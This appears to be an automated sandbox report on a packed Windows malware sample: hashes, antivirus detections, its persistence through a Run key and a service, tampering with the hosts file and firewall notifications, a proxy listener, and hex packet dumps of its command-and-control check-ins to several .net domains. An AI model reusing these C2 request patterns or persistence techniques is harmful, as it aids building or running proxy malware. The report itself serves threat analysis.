Analysis Date2014-10-13 22:29:25

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: dfa531d16c2ec2415e251e8d7157cde9 sha1: f3b34341b037d8641500b8a6c1c2e06981a0faa5 size: 794624
Section.rdata md5: 82f70c93a475199ab9cd62d17c1e60a4 sha1: 68fd9b40c1b96f9fb93504e1b51d02bfdd7beedf size: 58880 md5: 8ce48ded547fc30bc4fb898e6f6f56e5 sha1: fa2536339098d54e3c8b982d39da09cac225e520 size: 438784
Timestamp2014-09-05 10:48:04
PackerMicrosoft Visual C++ ?.?
AV360 SafeGen:Variant.Symmi.22722
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAvira (antivir)TR/Crypt.ZPACK.Gen8
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVDr. Webno_virus
AVEset (nod32)Win32/Kryptik.CCLE
AVFrisk (f-prot)no_virus
AVGrisoft (avg)no_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus
AVYara APTno_virus

Runtime Details:


↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\is0vgvt1lw7tawwnqvjnc.exe
Creates FileC:\WINDOWS\system32\zebajflqkdygw\tst
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\is0vgvt1lw7tawwnqvjnc.exe

↳ C:\Documents and Settings\Administrator\Local Settings\Temp\is0vgvt1lw7tawwnqvjnc.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Accounts Link-Layer Backup Plug TP ➝
Creates FileC:\WINDOWS\system32\vykeyqsl.exe
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\WINDOWS\system32\zebajflqkdygw\lck
Creates FileC:\WINDOWS\system32\zebajflqkdygw\etc
Creates FileC:\WINDOWS\system32\zebajflqkdygw\tst
Deletes FileC:\WINDOWS\system32\\drivers\etc\hosts
Creates ProcessC:\WINDOWS\system32\vykeyqsl.exe
Creates ServiceProgram Proxy Socket Routing Filtering - C:\WINDOWS\system32\vykeyqsl.exe

↳ Pid 804

↳ Pid 852

↳ C:\WINDOWS\System32\svchost.exe

Creates Filepipe\PCHFaultRepExecPipe

↳ Pid 1112

↳ Pid 1208

↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
Creates FileWMIDataDevice

↳ Pid 1148

↳ C:\WINDOWS\system32\vykeyqsl.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝
Creates FileC:\WINDOWS\system32\zebajflqkdygw\rng
Creates Filepipe\net\NtControlPipe10
Creates FileC:\WINDOWS\system32\zluzfil.exe
Creates FileC:\WINDOWS\system32\zebajflqkdygw\lck
Creates FileC:\WINDOWS\system32\zebajflqkdygw\run
Creates FileC:\WINDOWS\TEMP\is0vgvt1s82ta.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\zebajflqkdygw\cfg
Creates FileC:\WINDOWS\system32\zebajflqkdygw\tst
Creates ProcessWATCHDOGPROC "c:\windows\system32\vykeyqsl.exe"
Creates ProcessC:\WINDOWS\TEMP\is0vgvt1s82ta.exe -r 44082 tcp

↳ C:\WINDOWS\system32\vykeyqsl.exe

Creates FileC:\WINDOWS\system32\zebajflqkdygw\tst

↳ WATCHDOGPROC "c:\windows\system32\vykeyqsl.exe"

Creates FileC:\WINDOWS\system32\zebajflqkdygw\tst

↳ C:\WINDOWS\TEMP\is0vgvt1s82ta.exe -r 44082 tcp

Creates File\Device\Afd\Endpoint
Winsock DNS239.255.255.250

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝
Flows TCP192.168.1.1:1042 ➝
Flows TCP192.168.1.1:1043 ➝
Flows TCP192.168.1.1:1044 ➝
Flows TCP192.168.1.1:1045 ➝
Flows TCP192.168.1.1:1046 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 6f757468   ose..Host: south
0x00000070 (00112)   626c6f6f 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 616c7473   ose..Host: salts
0x00000070 (00112)   65636f6e 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2077 6865656c   ose..Host: wheel
0x00000070 (00112)   7265706c 792e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2077 69736864   ose..Host: wishd
0x00000070 (00112)   6973682e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 61646570   ose..Host: madep
0x00000070 (00112)   7572652e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2068 61697268   ose..Host: hairh
0x00000070 (00112)   6f75722e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 75736963   ose..Host: music
0x00000070 (00112)   686f7572 2e6e6574 0d0a0d0a 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2068 616e6768   ose..Host: hangh
0x00000070 (00112)   6f75722e 6e65740d 0a0d0a0a 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 6f757468   ose..Host: south
0x00000070 (00112)   626c6f6f 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 616c7473   ose..Host: salts
0x00000070 (00112)   65636f6e 642e6e65 740d0a0d 0a

C
 Class Hierarchy Descriptor
 Complete Object Locator
copy constructor closure
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
- CRT not initialized
dddd, MMMM dd, yyyy
default constructor closure
deque<T> too long
DOMAIN error
@DsJ }
dynamic atexit destructor for
dynamic initializer for
eh vector constructor iterator
eh vector copy constructor iterator
eh vector destructor iterator
eh vector vbase constructor iterator
eh vector vbase copy constructor iterator
english-south africa
english-trinidad y tobago
- floating point support not loaded
fpmaimhva bkm hcmulf mdye ncufa pifhewjso mrposm afjabuhnm zrmojbdusg dctimet pgo zcg ewavjiruc rvp nbdakcsot rte geisse npusetzbur dvdel esyse pffezar ecifadaedb ooco cddeemo ffk mrhot tcas bacb dojxen ixnjusazbi wvceam flheevd aelsde scce ltaaf hta ttnelbsaey jmzacow delm evhgadc jougbelmit csjiugzcem cju poppee ogfda wvyiusabai nbg piblob hrlumdce gzze cxioqanzci qziweavdja brvovdegu xosigale jtab eslf cmbafdvoef anqexeubt ygo hgsuec jdvaiijpu hmse grjefsjajk mvdin ztzu ijgamior urogboid lpg dxjonpzo igjlepgo bqjahvjip ilfene tcalioaj djjojnrijw hdjosmle fungo pptil zefpadvfo sugd orubvamj qccabifia birucaaedo civcugjutu sembodj aboz iucw cscouzusub gcmeax fsobeniau cllizfguw nefjohs mavg ggpipf avgd ides jdametdnug dajsiimpg jlnefxjav pscolcj bimpub cngu luw nhcaqgpe aeigwd pdluc lajbaay arillea drzadopj dujze bmfot udrc mbjomv csl nnra pzkuspj apcy mfc bummok mcmiendine lpuuyalod njiedupdeo sssipgmiss afncoreub gij cpjepczid fjrabdsib begbaf phde gkelansqem fbvuzofi sapsocgd ldjafjse iner fcbe pdnigr ufguagegp mjgaezrda aipfgo lercui loolb sjwol ynbei giordes jthaiy imobiz gmr ofbe jmpil dmtocpwia dunumaefyo ggpuvolut fmmef ndjisi uljina gavudetbi nppe udenkitgb ffb uuai oujngalkjo cnlun nsf qcrindxufz efatejec cmdiinp zgdel vpluaz hfdibdl pogtaumhy mobdeiur ukf nijsasv ldneang sch tiixeg uhj dcb gbsudfe vogionimr fgj svw uudrmi dpobaiaef aflpemg uzobna wgreslba jfn cycam glresdjo tlpoaqqjui hhdawhkuew sawlow fdsuzdu lal advdejfjar prfezjbe uczmeb cmz olidnaj ocursiviei jlgaszla jerojabp vup ylgepoln jyronj asn cfewoi lrzi
great britain
invalid map/set<T> iterator
invalid string position
	iobl vcfejkabof dmnaer lrelaca sfnawf sllolmbak lcji mmefucndo daz abmsuv dgbuzgaafi yhvufugdat jubcubwfan zvnob mojwabld aecvmif eci frecooeou cent gmgeicxjed zpdefauggi pjmegdzer nar zsc stzig cqb blsadsmu mve pnqa afcd qrnaycy fjlecrvaej jlcaf fffixipbuf bdnoyuvmi pgmuw fzioteo stpejlzos ycjeggnuvv aenfjajr oofpcuf zblocf fttie jldau jibalop gccobrot seispenl soosyohv hxi fbtijbce asenupebz zildeeg vvvill uajgdu jck fod mfz tputeji zimm crlagcet ozur pgfomjb ltepiep bdoci flemau zjbukxfalr aqb fof dkqumdgol didjotft ptjio tizerorxzi rnputte xdreteqa beunqiat mbja pvhu cafe wrbe sncebjl ogzdajupb pzlu ymjejuosy bgf jdirujrs bygegfmir jjeuti eajn slpumjpo dhl uppr syfoelsyuc ngsuybveb vfujewix jzk ddzagptec nhco bvve nstepcliu wvafecm uysidotea gddejzbe sngecubdoz lrtelr plnaliv dss hjijafhcug empovoigv omltaa msbao qbicazj djgiqaina jzi sejfail igxsijgs fyvob gqbalbpao lpyempr cucouduv pgkovq zsg dyfuez noibs zrm dabjaqec bcj ykpibfnom mopbaj hhcu pvreoeua lrqopalp udj dkledi ludcaug ldbe gopfonu flka zeibdiig usacwoge fnnula aal jkdujdb sopvunua sleb hlsobctap tbj julmepttiz reefveo msufiob npmeooqd vfceisrke cajrixba lploizhco gjyabfnis lla dsg vdlii vewnasucd ftaka udugg zga apyf fzacereag fsg baqle apoffi fiel lboatulqb vsifalfge cpwa urkyixlma ulfqost iufoeep ldmoec ngabiomli obhdi nxlamtoaat jgveyb gnju oufbluz fjfojf mjnu evzu cmtou xxvibw gpcijqbi gpm gpneoob skcicdjo puczo fjfinifm zsnijssup vdselos flnadqs ljf jfijadue veofgoppbo nsfaansf imlcas caglofqcac psrolztogd ibpne lfpel molsesbp xaodgus mik jdjuldza ggfei auapbi cjrojdriro bfexo ajmibig mffi nvd rdvaab jfefedl cgyehx mvumoh pqsuccde nckocfborr fcqa daangiorji poksifjo zadfurrc lypatalm gfn ckbainne fju ageo rnamoapzn bebzuyqsir dmcu ecpbabcm qmjinmbeu bpmummc agf smbuw zubmo ogpsas qlgupmci fvqojs aadenze mwnackleh qfgeugznuy goib rllin ggk lomfi nnk bdez bpb rdgauu qogt zcducgg tdboc vsnemwci fydapfnof zsq uzr ppge czi omueccoyi lqnicf pbpeucz rgjedamm bvpifbpanf qbqi ivvm ajaoocse ibgs fooib ucyfixu cpmao nmqoa vzc gdeeigiabb nozbunfou zelmune dmjupkea jenaj
ios_base::badbit set
ios_base::failbit set
j	hDaM
j	hDUM
j	h MM
j	h@uQ
j@j ^V
local static guard
local static thread guard
local vftable
local vftable constructor closure
managed vector constructor iterator
managed vector copy constructor iterator
managed vector destructor iterator
map/set<T> too long
Microsoft Visual C++ Runtime Library
-NlW G
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
NP8S	g
omni callsig
pdQ:	k
placement delete closure
placement delete[] closure
Please contact the application's support team for more information.
pr china
program name unknown
- pure virtual function call
runtime error 
Runtime Error!
R:X0	+
scalar deleting destructor
SING error
south africa
south korea
spanish-costa rica
spanish-dominican republic
spanish-el salvador
spanish-puerto rico
)S<r	[B
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
trinidad & tobago
t$<"u	3
 Type Descriptor
uDj	hh
udt returning
u		jPoI
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
vbase destructor
VC= zS)
vector constructor iterator
vector copy constructor iterator
vector deleting destructor
vector destructor iterator
vector vbase constructor iterator
vector vbase copy constructor iterator
virtual displacement map
x#,% \
x @q;js
